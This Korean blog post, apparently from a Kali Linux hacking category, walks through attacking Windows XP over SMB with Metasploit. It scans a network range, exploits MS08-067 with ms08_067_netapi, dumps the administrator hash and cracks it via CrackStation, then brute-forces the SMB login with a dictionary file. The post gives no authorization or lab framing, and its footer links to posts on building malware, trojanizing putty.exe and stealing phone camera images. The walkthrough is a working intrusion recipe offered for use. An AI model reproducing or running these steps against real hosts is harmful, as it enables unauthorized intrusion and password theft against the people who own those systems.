SMB-Server Message Block 으로 윈도우의 해킹 취약점중 하나입니다.
MSF를 사용하여 SMB 취약점을 스캐닝하고 해당 취약부분으로 해킹이 가능해집니다.
[사용법 및 명령어]
service postgresql start
msfconsole
use scanner/smb/smb_version - smb_version 모듈을 사용해 스캐닝합니다.
show options를 이용해서 설정할 옵션들을 확인합니다.
set rhosts [스캐닝할 네트워크 범위] - remote host를 스캐닝합니다. ex)192.168.0.0/24 는 192.168.0 네트워크를
스캐닝한다는 의미이겠죠?
set threads 40 - 사양에 따라 숫자를 맞추시면 됩니다. 높을수록 스캐닝이 빨라집니다. 사양이 낮으면 너무 높을경우 버벅일수 있습니다.
run
그러면 스캐닝한 결과가 나오고 해당 취약점이 나온 ip주소를 따서 해킹에 사용하는데요.
use windows/smb/ms08_067_netapi - 윈도우 xp 해킹을 위한 모듈을 사용합니다
show options,set rhosts [취약한 ip주소],run 으로 실행해주시면 됩니다.
[윈xp 비밀번호 알아내는법]
해킹 후 hashdump 명령어 입력,
Administrator의 : 다음에 있는 해시값을 복사합니다. 중간에 끼거나 한 : 콜론은 지워주세요
그 후 구글에 crackstation에 가서 해시값을 원문으로 복호화해줍니다.
패스워드가 될만한 문자열이 여러개 나온 경우 비밀번호를 모두 복사해 사전파일로 만듭니다.
use auxiliary/scanner/smb/smb_login - smb_login 모듈을 사용합니다.
show options
set smbuser administrator - 관리자의 비밀번호를 해킹해야겠죠
set pass_file /root/pass.txt - 만들었던 사전파일 경로를 넣어줍니다.
set rhosts [xp ip주소]
run
무차별 대입 공격을 시도하는데 -로 된 부분은 실패, +로 된 부분은 패스워드입니다.
'2. 시스템 해킹 및 모의 해킹 > Kali Linux' 카테고리의 다른 글
| 칼리 리눅스에 크롬 설치하기 (1) | 2024.10.11 |
|---|---|
| 칼리 리눅스 한글 설정법 (0) | 2024.10.11 |
| Veil Evasion 악성코드 만들기 + rdesktop 원격조종 (0) | 2023.12.27 |
| putty.exe 안에 트로이목마 넣기 (0) | 2023.12.27 |
| msfconsole 명령어 정리 - 핸드폰 위치추적 , 웹캠스냅[폰카메라 유출하기] (0) | 2023.12.27 |
